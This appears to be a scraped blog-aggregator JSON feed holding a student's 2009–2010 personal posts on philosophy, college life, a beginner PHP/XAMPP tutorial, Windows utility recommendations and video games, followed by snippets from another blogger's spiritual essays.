Thoughts","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F05\u002F25\u002Fwhat-the-hell-is-this\u002F","2010-05-25T00:00:00.000Z","[Editor’s note: I found this scrawled across a a4 sheet in a classroom. The author drifts off way too much from his thinking to make any sense, but there were some things that I really liked. So I present them to you, unedited, random, and unexplainable thoughts of a genius. My comments are in brackets]\nSometimes you are just destined to be where you are. You may try to veer off course, try to change it. But the end remains the same.\nYou.Here.Now\nThe forces of Destiny seem too powerful to be stopped by you. So you keep on flowing. Further & further away.\nAnd time moves on\nAnd its Now already.\nLooking back at the choices you made, the crossroads you stood. The coincidences, accidents pile up and as you remember them you think - would you have chosen otherwise?\nBut regardless of your answer you’d still be here, Now.\nAnd its only left to deal with the Now.\n[Note: Now the author takes a swipe at history. lol]\nEver since mankind learned to reason, the challenge had always been to tackle the Now. For tomorrow was forever being planned, partly in our own dreams, and partly in the garden of Destiny\nAs of the Past, it was just a multitude of feelings, a vault to choose from - Happy, sad, heartbreaking, exciting memories, remembrances, last words. The Past always walks besides us - sometimes haunting, crippling us down, and at times uplifting, encouraging, & maybe even expecting.\nAnd so the challenge remains the the Now. What do you do with it? Go ahead and battle it head on - as you’ve been asked to, regardless of the consequences?\nFor herein lies the path to greatness, the say - Keep Fighting. But is it the only path?\n[Note: Here on the author seems to get drifted far too much in his own thoughts, and does not care to explain very much. As a result much of the following is pretty self contradictory, and maybe even rubbish]\nWhat if there is another road. A road much less taken as Frost said. A road you know nothing about.\nWhat if the present is not a choice? What if it is just a sequence of events to be played out from someone’s memories, where you just play your part, and in-spite of what road you choose, you end up where you must.\nSo you fight. And think. And fight with the Present [As if the present is a monster, you fool], believing that the Future can be changed, it can be manipulated, morphed into someone’s likeness.\nYour head starts to pound with the effort. You decide to stop thinking. [Ahh. Finally, I was wondering how long I would have to keep up]\nIts clearing your head.\nThen you look around you. [Reality, anyone?]\nThe Present closes in [Not again!!] You realize its not there to be defeated, or to win either.\nIt just is.\nJust as you are.\nAnd you close your eyes again.\nYou start to think.\n[I like the ending]",[],{"slug":3228,"title":3229,"link":3230,"pubDate":3231,"contentSnippet":3232,"tags":3233,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"worries-css-template","Worries Css Template","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F04\u002F15\u002Fworries-css-template\u002F","2010-04-15T00:00:00.000Z","Finally, from being a complete programmer to a designer as well, who can create a css template using Paint.Net. Photoshop is way too outlandish for me, you see. It wasn't easy, but it was definately fun. The template was based on a wallpaper by http:\u002F\u002Fleon-gao.deviantart.com. The final template is still unnamed. Hope you all like it, and there is a demo available at http:\u002F\u002Fnemo.criitique.in\u002Fworries . [caption id=\"attachment_55\" align=\"alignleft\" width=\"300\" caption=\"Worries Template\"][\u002Fcaption]",[],{"slug":3235,"title":3236,"link":3237,"pubDate":3238,"contentSnippet":3239,"tags":3240,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"whats-sailing","What's Sailing","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F03\u002F23\u002Fwhats-sailing\u002F","2010-03-23T00:00:00.000Z","Aboard The Nautilus, that is\nI finally decided to write a blog post for my non geek friends with affiliations ranging from DPs to BPs and the oblivious to all, but the elite few, GPs (Keep thinking, non_IITians). In midst of all the chapos, and ghissai(not me, of course), Nautilus has been, and will remain a lonely submarine beneath the ocean. And this has been the way for me in the past month. After a hefty piece of time where we were attacked by the mighty INS Cognizance (actually it was a retariation attack, because you see, Nautilus had won an event of theirs, a treasure hunt, and the mighty Cognizance, and the event organizers deemed the methods of my winning to be dishonest. (I had my reasons). But after that a hefty war at the seas resumed. I, had the luxury to dip underneath and avoid everything, once in a while. But rumours surrounded me, and I started to hear all sorts of things about me. And that is when the drama settled once and for all.(It ended with a 5k fine, if you need to know).\nINS Cognizance is on its way for the end of its journey(Join it @ www.cognizance.org.in and 26-30 Mar, IITR). However I shall be busy participating somewhere else, Chaos ‘10, India’s largest gaming extravaganza. I have assured INS Cognizance that Nautilus shall no longer be troubling them, but who knows with such waters, a collision may be unavoidable in the near future. And when that happens, I’m taking my warheads with me, just in case.\nIn other news, I have been working on a couple of my own ideas, such as SMAC-I (Search Music Across Channel I), a Video Portal for Cinematography Section, IITRAANA.org, Counter Strike servers, the Intra Bhawan Gaming Tourney (which we won easily enough in AoE, NFS, as well as CS). Congrats to my clan mates. The net connectivity has been terrible here, and I’ve been derailed a few times along my route to Gmail.  Among other news, Oh, and I won the second prize in srishti’s dynamic website design, for LION- my twitter clone. I may or may not launch it, because you see, its just another clone. I also put up a new design for Criitique.in. Please check it out, and comment. I also posted a lot of pics and designs in Kriti , the DeviantArt clone for IITR. Check them as well.\nFor those outside IITR, the link for my web presence is http:\u002F\u002Fnemo.criitique.in.\nHere are some final few words in parting to all my frnds @ IITR\n@[Ex!$TeN$n3] - gl hf, gg :)\nAnd special thanks to DR. Lecter, General Hendrix for making the legend of Capt. Nemo a reality. If you ever need assistance in a cross atlantic trip, let me know. I may ship you till atlantis, after which you are responsible for yourself and your belongings :)",[],{"slug":3242,"title":3243,"link":3244,"pubDate":3245,"contentSnippet":3246,"tags":3247,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"learning-phpmysql-part-1","Learning PHP\u002FmySQL Part 1","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2010\u002F02\u002F20\u002Flearning-phpmysql-part-1\u002F","2010-02-20T00:00:00.000Z","Over the past 2 months, I’ve been learning PHP\u002FmySQL as a great language. After helping out a lot of people, I’ve decided to write a tutorial on using PHP\u002FmySQL to create a cool website. For the entire duration of this tutorial, this is the list of softwares we will be working with:\nXAMPP Server Lite version (to get apache & mySQL)\nDreamweaver CS4 (For Template Support). Alternatively use Microsoft Expression Web 3.\nNotepad++ (Its a cool editor)\nPHP Manual (download the full html version)\nThe website we will be developing is called Artemis Fowl Files (AFF for short). It is a small website with several features that we shall develop over the length of the tutorial.\nInstalling PHP & mySQL using XAMPP\nPHP is a server side scripting language. Which means that PHP is run on the web server itself. For example any PHP script running at Google.com will remain on the server, and not reach you (the client). By contrast, JavaScript runs on the client side, i.e. any JS code must be transmitted to the client before being executed.\nThis is how a basic PHP script actually runs:\nPHP source File –> PHP Parser (running on the web server) –> Becomes an HTML file –> HTML File sent to Client\nWhich means that the PHP source file is run on the server, which converts the file to a pre-calculated html file, which is then sent to the client. Lets write some basic php coding.\n\n1:  \u003CHTML>\n2:  \u003CHEAD>\u003CTITLE>Sample PHP File\u003C\u002FTITLE>\u003C\u002FHEAD>\n3:  \u003CBODY>\n4:  \u003C?php\n5:  echo \"This is a sample PHP File\";\n6:  ?>\n7:  \u003C\u002FBODY>\n8:  \u003C\u002FHTML>\n\n\nThe basic context of PHP is that the only code that is considered PHP is that covered between \u003C?PHP and ?> blocks. Anything outside these is neglected and remains the same(i.e. it is not run on the server). The echo command sends the text string to the html file. All this means that the file received by the client will look like this:\n\n1:  \u003CHTML>\u003CHEAD>\u003CTITLE>Sample PHP File\u003C\u002FTITLE>\u003C\u002FHEAD>\n2:  \u003CBODY>\n3:  This is a sample PHP File\n4:  \u003C\u002FBODY>\n5:  \u003C\u002FHTML>\n\n\nThis is what you will  get if you ran the script on a test server. But before doing that we must install XAMPP, and do some basic setup stuff.\nDownload, and Extract XAMPPlite.exe anywhere in your computer. Go to where you installed it and run setup_xampp.bat. This will automatically start the Apache Server, and the mysql Server by default. Also try tinkering with XAMPP-Control and see what runs it.\nNow open your web browser (Firefox\u002FChrome is preferred) and open http:\u002F\u002F127.0.0.1. This IP address is a loopback IP address and always refers to this computer itself (yours). Now you should see a XAMPP splash screen. Go ahead and explore. As of now, what you’ve achieved is this : Installed Apache and the mySQL server. Now we need to change the settings for mysql. Open http:\u002F\u002F127.0.0.1\u002Fsecurity\u002Fxamppsecurity.php and change the mysql root password(its blank by default). Also set a password on the xampp directory, so that others cant access these settings. Remember the mysql root password, for it will be useful later on.\nNow comes the part where we actually sit down to write some code. We will be developing the mysql parts in the next segment. However we still need to do some other little things before we reach that part.\nCreating The Dreamweaver Template\nNow, call me lazy, but I don’t like designing themes, and CSS for my websites. I usually use a free one. And for the rest of this tutorial, I assume you will do the same. We need to create a Dreamweaver website using a readymade CSS Template. To get a template head on to http:\u002F\u002Fwww.freecsstemplates.org. I choose this template. Feel free to choose anything. It does not really matter which, but take care not to download a three column template, because what we will be developing is quite basic.\nCreate a directory called artemis inside htdocs folder(found inside xampp). Extract the css template files to the artemis folder such that the index.html file is inside xampp\\artemis . Now head to your browser and open http:\u002F\u002F127.0.0.1\u002Fartemis.\nIf all went well, you should now see the template theme. Now we must convert this css template into a Dreamweaver template. Open the index.html file in  Dreamweaver. We have to mark certain areas that we intend to edit in each document as editable. For instance the top header in each document must remain the same and would not be editable. But the sidebar content may need to change as per each page on our site. Taking this further the footer will be the same for each page. To create an editable region, just select a sample text from the main text (the one on that looks like the blog entry) and right click –>Templates->Create Editable Region.\nDreamweaver will give a warning that the current document will be converted to a template. That is what we want. Give a name to the region(lets call it ‘main’). Now delete everything other than this main region from the right column(ie the blog entry column. You may need to switch to the split view to cleanly delete the html markup.\nSimilarly create another editable region for the sidebar. Remember to delete everything else in the sidebar as well. Now there is something to Dreamweaver which requires you to create a “site” before you can create a template. So go to Site Menu and click on New Site. Choose a site name (Artemis) and enter the correct web address where you can access index.html (http:\u002F\u002F127.0.0.1\u002Fartemis or http:\u002F\u002Flocalhost\u002Fartemis). Tell Dreamweaver that you want to use a server technology (PHP mySQL). Choose edit and test locally(because we don’t yet have access to an external web server).\nOnce you’ve created a site, you can save the web template. (Ctrl S). Currently no templates exist in our web site, So we will create one and call it “main template”. If Dreamweaver asks you to update links, press yes.\nNow we will create our basic home page using this template. Press Ctrl+N to create a new page. On the left choose “Page from Template”, Choose the site as Artemis, and the template as well. Press Create, and viola, we have our homepage. You may see that the heading, footer, and links are not changeable, because they’re not defined as “editable” in the template. However the regions you choose to be editable are marked as such. Try writing some basic text in the sidebar and in the main content screen, and then save the file as index.php.\nNow open http:\u002F\u002F127.0.0.1\u002Fartemis\u002F in your computer, and be greeted with your newest creation. It’ is still, as of now, a static site, with links that don’t work and no dynamism, but we will make it better in the next part.\nIf you had trouble following this tutorial anywhere feel free to post comments, or tweet me @captn3m0. I will be happy to reply. Further if you feel that you missed something, here is my work for you to compare with:\n\u002F\u002F#todo add link to zip file here",[],{"slug":3249,"title":3250,"link":3251,"pubDate":3252,"contentSnippet":3253,"tags":3254,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"nautilus-behind-the-curtains","Nautilus : Behind The Curtains","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2009\u002F12\u002F04\u002Fnautilus-behind-the-curtains\u002F","2009-12-04T00:00:00.000Z","Almost everyone looks at my laptop’s screen, and asks me “is that Windows 7 ?” and I reply each of them with the same answer “No”. I have not yet moved to 7, because of various reasons, which I am not going to explain over here, but lets just say that I’m still clinging to dear old Vista. I don’t really have much of a trouble with Vista as many people have said. I work blazingly fast with Vista, which is what it is all about. As an operating system, it is expected to help me get my job done, not do everything by itself”. And this is where my software listing comes into view. Since everyone have those “how the heck did you do that?” moments when they look at me doing stuff, I decided to publish a listing of some of my favourite applications that I use so that I may redirect you to safe spot where you may choose things as you like. This listing may not suite your way of working, however you might find a gem or two along the way. This is not a listing of all softwares that I use. Rather just a collection of cool tools that I think every Windows user must be using. If you think you’ve found that killer-app for doing things, do let me know in the comments. I’ll be listening.\n**Dell Dock : **I just love this tools and its ability to divide the applications that I use into categories. It doesn’t take much of a screen estate, and takes me where ever I ask it to. With the ability to assign custom icons, and add separators\u002Fcategories etc, it is more than an average dock, its my favourite dock. On the downside, this is only for Dell Computers, and comes preinstalled. However you can download it from here if you didn’t get it with your dell systems. Non dell users may be interested in RK Launcher, a freeware dock that simulates Mac Dashboard, and does a pretty good job. There was another version of Dell Dock (2.x which has yet to be released on the website, but was available to Dell Studio buyers, with new and better icons. Drop by a comment if you need it.\n**Windows Sidebar : **Another tool I find myself using frequently is the Windows Sidebar, with 3-4 gadgets that are absolutely essential to me, such as the NowPlaying, MultiMeter, and the Top Processes gadget. A key shortcut to remember here is Win+Space which pops up my sidebar. Gadgets are a quick way to organize yourself, and keep a check on other things, like you schedule(Date Time), twitter(Twadged), quick launching apps, direct search among other things. Most users underestimate their usage and restrict themselves to the Clock and Slideshow gadget. Go ahead and search for them, see if you can find a gadget that matches what you’d like.\n**Quick Launch : **Not many would regard this as a tool, however this gives one a productivity boost. Try putting your favourite tools in the Quick Launch, and see if that helps you a bit, between searching for that app in Start Menu, or clicking it right where its clickable. Also try increasing the size of the Quick Launch, by Unlocking the taskbar, right click->View->Large Icons. That really looks cool!\nInternet Download Manager** :**My personal favourite download manager. Others that you may be interested in are : Orbit , DownThemAll! ( a firefox extension). Helps me keep a track on what I’m downloading right now, and speed benefits are downright clear. I also like its feature to capture downloads from any application, so I don’t have to wait for those updates taking forever to download. Downloads using batch files, schedulers, and even turns off your computer when its done.\nEverything** : **I should have put this above all in the list. This is such a good tool, I cannot overestimate its importance. What it basically does is searches “Everything”. The tool does not index file contents\u002Fproperties, and only maintains an index of file names. As such it is blazingly fast, and searches all my applications\u002Fmusic\u002Ffiles damn quick. With an efficient shortcut(such as Win+S), you’re on your way to becoming a windows power user. On the downside, once you start using this real frequently, you tend to get a little disorganized putting stuff everywhere, knowing you will find it with Everything. Here’s a link to the website. (MUST USE)\nBrowsers : In browsers, I currently use a combination of Google Chrome\u002FFirefox as my primary browser, updated to the latest dev build, and last  stable beta respectively. Both of these are great, and I prefer Firefox with its huge base of extensions available. And if someone is out there using IE still, please switch immediately. Firefox is such a great way to browse with, and Chrome such a ease on the eyes. Its hard for me to pick between the two, I’ll rather wait and watch over the next year, where each one stands. Safari and Opera come a distant second for me with Safari being the better one.\nFile Tools : I use 7-zip for compression purposes, CCleaner to rid my computer of junk, Defraggler to defragment my hard disk, Recuva from the same company to restore those accidently deleted files.Another tool I would mention here is “GoodSync” which i use to sync my usb drive and my Documents. I also use it to organize my Start Menu, using a Dock folder in my Desktop, which i sync to the Start Menu. Dropbox is the best tool I use for my syncing purposes, between different computers. It offers 2 gb for starters, and all the sync is on the fly, meaning you just copy things to your Dropbox folder, which is automatically synced to all of your computer. It is also a great way to sync your projects with different people.\n**Multimedia : **I prefer Windows Media Player 11 for audio, and VLC for video viewing. With my NowPlaying gadget, and GTalk in sync with WMP, its easy to change tracks, and let others know what you’re listening to. I also use Zune occasionally when I’m in the mood of a pure music experience. Pictures are pretty easy to manage with Windows built in Photo Gallery, or its live version. Also check out picasa, google’s free photo management tool.\nOffice Tools :I am currently using a Technical Preview Beta of Office 2010, for documents,presentations. Notepad++ for text and code editing, Foxit PDF Reader for ebooks, and reading stuff, which is way faster, and smaller than that Bloated Adobe Acrobat Reader. I use Windows Live Writer, which offers a lot of plugins to edit posts, including this one.Offline gmail and Google Docs capability is way cooler than you think. Do try it out\n Anti Virus : This is one of the areas where I am consulted the most. Which antivirus to use? Well I would recommend you Kaspersky if you’re ready to shell out some money with a little slowing down to your system or use “Microsoft Security Essentials” which I currently use. It is quick, doesn’t hog down my system, stops real time protection when i want it to, excludes some of my dangerous folders from being scanned and nuked, updates itself, detects almost any virus I dare to throw at it, and looks neat. On the downside, however it is just minimal, with no support for hosts file scanning, white listing, firewall, cookie management, user control, among other “high level stuff” that other anti viruses offer. But I like it, have been consistently using it for last 3 months, and am pretty sure I’m virus free. It does have a catch : you must own a valid, genuine copy of Windows to use the tool.\nSecurity Tools : Security Tools includes those nifty small programs that help me keep my computer safe, and sound. This listing comprises of tools I would suggest to the average user, I personally use a combination more than the following tools:\nAMPAWSmasherX :Stops antiviruses from using your pen drive as a medium, by blocking that autorun.inf file. You might not find the tool easily available for download, but if you do, its a pretty good one.\nSpyBot Search & Destroy : This is a one stop protection for all malware. Keep the definitions updated, however, and you will find that infections are pretty easy to deal with.\nHiJack This : Must use every 2 weeks or so. Shows you anything that has been changed from normal settings on your computer,and allows you to change it to default. Use carefully, as it may cause instability on your system later on, as it is quite a powerful tool, and if you don’t know what to do, generate your report, and post it online in one of the help forums.\n WinPatrol : This is also a must-use program for securing your computer against anything “unwanted” which may include viruses, malware, additional crapware, fake windows services, hidden files, and the like. This is basically a watchdog(Scotty), which keeps a watch on any new startup programs (my favorite), and file extension changes, and new services and the like. If Scotty detects an unwanted change in your system, it barks and reminds you of the change and asks you if you’d like to keep it. It also allows you to add\u002Fremove\u002Fdelay your startup programs list, and is my favourite program of the lot.\n**Other Tools : **I would just like to recommend some more everyday helpful tools to you, in no particular order. Try them out, you might like them or not, but they are definitely worth checking out : TeraCopy, AveThumbnail Resizer, TuneUpUtilities, VistaGlazz(must use for including transparency in title bar, appwiz.cpl, WinBubbles, Privoxy, TaskBar Shuffle, Paint.NET, DupFiles, WinDirStat, OverDisk (both for checking disk usage), PMenu(especially if you use portable programs in you usb drive, or for assigning Win+ hotkeys to programs, like I use Win+P=paint, N=notepad), Nero Free version among others (Refer below for a complete listing)\n\n**Looks : **Looks are necessary part of making your computer shine out in the crowd. And I use the least required programs for that purpose. Using Tune Up’s styler to change my login Screen, and my personal wallpaper collection which I shuffle through using “Vortec Wallpaper changer”, a utility i built. Using Vista Glazz to patch my theme files to support 3rd party themes, I use themes downloaded from “deviantArt”. I also iconized my taskbar, for efficiently managing taskbar, and changed the quick launch icon size to large(looks cool).  QTTab Bar is also a cool addition to Windows installing tabbed browsing in Windows Explorer. The current theme I use is “Cleaero”, and it gives me some cool transparency. I also use PowerMenu(another must use)for adding transparency, or changing priority of any window. I love it when my firefox window is transparent and I’m browsing while watching a video in the background. That is damn-right as cool as it gets without using Windows Blinds. And choosing the coolest gadgets can make all the difference, so see if you can find the right ones!\nComplete Listing of Tools\nThe above was just a partial listing of the programs that I use. I generated a file listing of all the sofwares that I using four different methods. All of these are in text files, that you may use, with one exception. The easiest one is a tree map generated for my Dock Folder(list.dock). I generate a listing of all exe files inside my program files(which may not be complete since many like Chrome are installed in userdata folder). This one is renamed as list.exe.txt. Next I generate a listing of all installed programs using Hijack this!, called list.hijack. Another one was compiled using windirstat (list.windirstat). Using OverDisk I generated a virtual folder view of my Apps directory(this one’s huge at 2.x mb). Then I zipped them up and post them here. Browse through them, you might find a lesser used unknown app here. Especially check out the “tiny” folder. It is literally legendary, with tons of stuff! And one more thing, use OverDisk to open the ovd file.\nDownload Here – Listings\nThis list was composed by Capt. Nemo as a recommendation for non-power users of Windows. You are free to check out any of the programs, most of them are freeware, if not open source, and do not pose a harm to your computer. However if anything happens to your computer by these tools I am NOT responsible for the usage of the tool. And I try to use open-source\u002Ffreeware tools as far as possible. If you use a commercial tool, do remember to pay the author, and stand against piracy. Otherwise use “Free as in Beer” tools like me!",[],{"slug":3256,"title":3257,"link":3258,"pubDate":3259,"contentSnippet":3260,"tags":3261,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"gamers-saga-games-to-play-and-not-to-play","Games to play and not to play","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2009\u002F11\u002F23\u002Fgamers-saga-games-to-play-and-not-to-play\u002F","2009-11-23T00:00:00.000Z","This article has been bubbling in my mind for quite some time, and I’ve decided to steam it off. There are games that you must play, like Mario or Contra. Then there are games that you play (Counter Strike, AoE). Some games you wish you could play (Assassin’s Creed, Far Cry). Games you should play (Braid, Minesweeper, Spore). And finally come the games you must NEVER play (Farmville, World Of Warcraft, Mafia Wars, School Of Magic and the like). Why this categorization? Because I recently decided to leave School Of Magic on facebook after a week long affair where I reached lvl 15, and was about to get into “thick of things” as they say. Why? Because I realized that SOM is not a true game. A game is supposed to be entertaining, and indulgive. If it tells me to do something, I must do it because I take interest in it. Not to get ahead of my peers. I recently came across an article by Jonathan Blow, my favourite game designer (Braid). He opened my mind to the fact that “A Game is a form of art”.\nYou may not agree with this statement right now, but consider James Cameron’s Avatar, which looks so close to real, yet is live 3d. It does look kind of gamer-ish, doesn’t it? And we all agree that cinemas, and literature are a part of our culture, part of our art. But as movies get closer to games(Resident Evil, Prince Of Persia), the same is happening the other way around. Games are becoming a part of our art culture. Games like Bio-Shock, and Fear portray the doomed versions of our future. The designer behind these games did not just say, let’s make another FPS, where you kill everything that moves (that was Doom 1,2 by the way). They decided to create a realistic storyline, and a better game play. That is as innovative as it takes to get the feel of the game to the player. Let us now take up some of these categories I defined quickly.\nGames You Must Play\n  These are the kind of games, that each of us has played. They remind us of how we first stared at that green background trying to figure out the next play in Solitaire. Or the joy of ducking under the dragon and touching that axe in Mario. These games still remind us about the giant leap that the gaming industry has taken. For Dave, Wolf-3d, Roadrash, we have reached graphics quality that surpasses HD (Call Of Duty Modern Warfare 2)\n  Games You Play\n  Skip this if you aren’t a gamer. If you’re one, well you know the games I’m talking about. Nothing beats taking a frag with a deagle. Other than maybe shouting 14 before all those AoE games. Its the thrill, and excitement, and your love of the game that keeps you glued to the seat. I won’t call these games entirely unethical, because the game play here is fair enough, and exciting. You know what you’re doing, and why. And its not just because of that score, or frag. It is also because of the satisfaction that you get after that frag.\n  Games You Wish You Could Play\n  Sometimes you Graphics Card isn’t all that powerful, or you just can’t find a torrent\u002Fdownload link for the game. Sometimes 10GB games do seem big. And sometimes, as in the case of FIESTA, the game hasn’t been launched for PC.\n  Games You Should Play\n  These are the games that really matter. That form of the core of my “games are art” theory. Games like Braid, Osmos, Minesweeper, Prince Of Persia (not all), Tomb Raider (again not all parts). These games take you into their own world, where you get to learn, listen, think, and observe. Where you play the game because its exciting, and fun, and you want to play it. Not because someone is offering you a “level up” if you click on a button.\n  Games You Should Never Play\n  If once is not enough, I repeat, Stay away from these games. Please, these hacked up versions of the same code, or sometimes game idea, do not deserve to be called as games. Mafia Wars, Restaurant, Cafe Shop, and all of those mindless facebook games come here. And so do War Of Warcraft, Travian, NFS Pro Street(that was just a bad game). These so-called-games\n    \ndo nothing to entertain you\noffer you nothing but just-another-level-up\nnever “teach” something (play braid, you’ll understand what I mean)\nhave nothing interesting\nThen what is the reason that they are so hyped, and most played MMORPGs? The reason is lack of better games. Lack of games that exist on facebook and is not-another-clone-of-mafia-wars. Lack of games that adhere to strict design ideas. Do not take me wrong. There are some serious game designers who are talented, but the truth is that they are forced to make what sells, and what sells is Mafia Wars. Unfortunately. And these people are forced to work for such games. Wasting their talent on such mindless games. And if all of this wasn’t enough read this quote by the CEO of Mafia Wars :\nI knew that i wanted to control my destiny, so I knew I needed revenues, right, fucking, now. Like I needed revenues now. So I funded the company myself but I did every horrible thing in the book to, just to get revenues right away. I mean we gave our users poker chips if they downloaded this zwinky toolbar which was like, I dont know, I downloaded it once and couldn’t get rid of it. laughs We did anything possible just to just get revenues so that we could grow and be a real business…So control your destiny. So that was a big lesson, controlling your business. So by the time we raised money we were profitable.\nRead the entire story on facebook gaming scams here. And if you’re with me, try picking up some better titles instead of playing these nonsense games on FB",[],{"slug":3263,"title":3264,"link":3265,"pubDate":3266,"contentSnippet":3267,"tags":3268,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"welcome","Welcome Aboard The Nautilus","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2009\u002F11\u002F19\u002Fwelcome\u002F","2009-11-19T00:00:00.000Z","This is my first real post on my brand new blog at wordpress, and quite seriously, I’m thrilled to get a new start. I hope this project would flourish unlike many of the other things I took up (Kasiasi, Papercut,…). I have not yet completely given up on Papercut, and I really liked the Google Sites interface, but posting online, and editing it takes time. So this is my first attempt at publishing offline edited work, using Windows Live Writer. I’ll try to use other options as well, and let you know which I like best.\nNow for some blogging stuff. What’s happening aboard the Nautilus? What is the Nautilus, and who is Capt. Nemo ? Let me answer these these three questions in my introductory post first. It all began in Kota, when I was a JEE student vying to enter the holiest institutes of the country, the IIT. And what I was doing there was, well studying and playing Age Of Empires, with my two best friends, Sankalp (aka General Hendrix) and Shundi (aka DR. Lecter). And our trio was one of the most feared AoE clans in Kota. We were playing together in perfect team play, and knew every counter there was to know, and every fact in the guidebook.\nThere was just a little flaw, I didn’t have a name. I used to play under various names, like Godfather, Eragon, and of course Harry Potter, but none of these stuck, and I was still nameless. I was like Maerad in the The Gift, looking for her true name. That night I went sleepless, and searched my inner soul for my True name. Both of my teammates already had titles (one doctor, and other a general), so I decided I would get one as well. And after storming by brain for all the books I’ve read, and all those movies, I settled for Capt. Nemo. Where did I get the name from? It was from a book called “20,000 Leagues under the sea”, by the immortal master of Sc-Fi, Jules Verne. The character of Capt. Nemo was one of most mysterious you could ever see. And one of the most brilliant. And I got it when I’d read it for the umpteenth time, Capt. Nemo wasn’t an enigma. Just because he didn’t fit into the definition of a hero doesn’t make him a villain. I could go on and on about the character, but that would take up space, which I’m determined to use to answer the other 2 questions.\nSo what is the Nautilus. I call pretty much everything I own, the Nautilus. Why? Because that was Capt. Nemo’s masterpiece. His submarine, and the very first, at least on paper.And my room and my laptop are labelled as Nautilus . And this blog is the path that I follow “Aboard The Nautilus”. That brings me to the third question, what I’ve been doing lately?\nLately I’ve been playing around with PHP a lot, and mind you it is really cool. I might post some of my experiences with PHP later on. And the reason I’ve been playing with PHP is because I’ve been working on my own website(its not exactly mine, its under Web Designing Section, IITR, but I’ve written 95% of its code). I’ll be launching soon, under a limited beta, so keep watching. I’ve also been working on the second issue of Criitique, an e-magazine for the youth. With kick-ass articles you are sure to like it. Do check it at www.criitique.com. Playing Age Of Empires is now a daily affair for me now, and I’ve been working my way up and down my timings. For those interested, my timings currently are “13,20,35 with 27,28-29 pop. I’ve been tweeting a lot, and I still don’t know why the twitter fad isn’t catching up in India. Twitter is fast, and easy, so why don’t people use it? Any ideas? Let me know.\nI’ve also got to study, with my end sems coming up, and this seems to be the time to do it. Got any more brainstorming ideas to work on? Wanna work with me? Join the fun Aboard The Nautilus\nAs an update, Windows Live Writer refused to connect to my blog and I finnaly used BlogDesk to publish my post. And I also tried Qumana, and wBlogger, and FYI, none of them work.",[],[3270,3271,3272,3273,3274,3275,3276,3277,3278,3279,3280,3281,3282,3283,3284,3285],{"username":16,"name":15,"photo":17},{"username":28,"name":27,"photo":29},{"username":39,"name":38,"photo":40},{"username":57,"name":56,"photo":58},{"username":69,"name":68,"photo":70},{"username":85,"name":84,"photo":77},{"username":95,"name":94,"photo":96},{"username":131,"name":130,"photo":132},{"username":151,"name":150,"photo":152},{"username":203,"name":202,"photo":204},{"username":214,"name":213,"photo":215},{"username":350,"name":349,"photo":351},{"username":411,"name":410,"photo":412},{"username":612,"name":611,"photo":613},{"username":983,"name":982,"photo":984},{"username":1640,"name":1639,"photo":77},{"id":3287,"title":3288,"body":3289,"description":3289,"extension":3290,"feedUrl":153,"lastFetched":3291,"maintainerName":150,"maintainerUsername":151,"meta":3292,"navigation":3293,"path":3294,"posts":3295,"seo":3356,"stem":3357,"__hash__":3358},"planet\u002Fplanet\u002Fpnudupa.json","Pnudupa",null,"json","2026-03-30T07:44:14.553Z",{},true,"\u002Fplanet\u002Fpnudupa",[3296,3300,3304,3308,3312,3316,3320,3324,3328,3332,3336,3340,3344,3348,3352],{"slug":142,"guid":3297,"title":143,"link":144,"pubDate":145,"content":3298,"contentSnippet":146,"tags":3299},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4996","When you just watch what&#8217;s going on with your seeing, hearing, smelling, tasting, touching, thoughting, feeling and your body-mind in general &#8212; it becomes very clear that you are not the things you see, the sounds you hear, the smells you smell, the tastes you taste, the objects you touch, or the body you have, [&#8230;]",[148,149],{"slug":166,"guid":3301,"title":167,"link":168,"pubDate":169,"content":3302,"contentSnippet":170,"tags":3303},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4983","When I started just looking at what’s going on, I first noticed the cyclic nature of all phenomena. Just about everything had a beginning, middle, and end. Whether it was breath, or heartbeat, or thought, or feeling, or a sound, or any other sensation for that matter. It seemed like life was just a stream [&#8230;]",[148,149],{"slug":255,"guid":3305,"title":256,"link":257,"pubDate":258,"content":3306,"contentSnippet":259,"tags":3307},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4977","As Turiya, what is the purpose of life? The purpose of a body-mind-personality system is easy to define in terms of goals, ambitions, aspirations and so on. But, as Turiya, what really is the purpose of life? The purpose of life is to make space for Karma to express and extinguish itself. The content of [&#8230;]",[148,149],{"slug":422,"guid":3309,"title":423,"link":424,"pubDate":425,"content":3310,"contentSnippet":426,"tags":3311},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4961","When I take a close look at anything, it seems to dissolve and eventually disappear. Behind everything, there is just emptiness. There is no solid stuff. It&#8217;s all empty. I understand that this can be a lot to take all at once. Let&#8217;s unpack it gently. What does &#8217;empty&#8217; mean? The word &#8220;empty&#8221; means exactly [&#8230;]",[148,149],{"slug":436,"guid":3313,"title":437,"link":438,"pubDate":439,"content":3314,"contentSnippet":440,"tags":3315},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4935","We live in the age of self-improvement. Therapy, trauma-healing, productivity hacks, and endless self-help advice promise to make us better, happier, more fulfilled versions of ourselves. But have you ever stopped to ask: who or what is actually being improved? Is there really a fixed “self” at the center of all these efforts, or is [&#8230;]",[148,149],{"slug":443,"guid":3317,"title":444,"link":445,"pubDate":446,"content":3318,"contentSnippet":447,"tags":3319},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4923","The 1999 blockbuster &#8220;The Matrix&#8221; unpacked so many complex philosophical ideas in a way that complete non-philosophers could comprehend and munch on them. I clearly notice a fundamental shift in my understanding of reality before and after The Matrix. When I watched it for the first time, I knew I got something, but couldn&#8217;t put 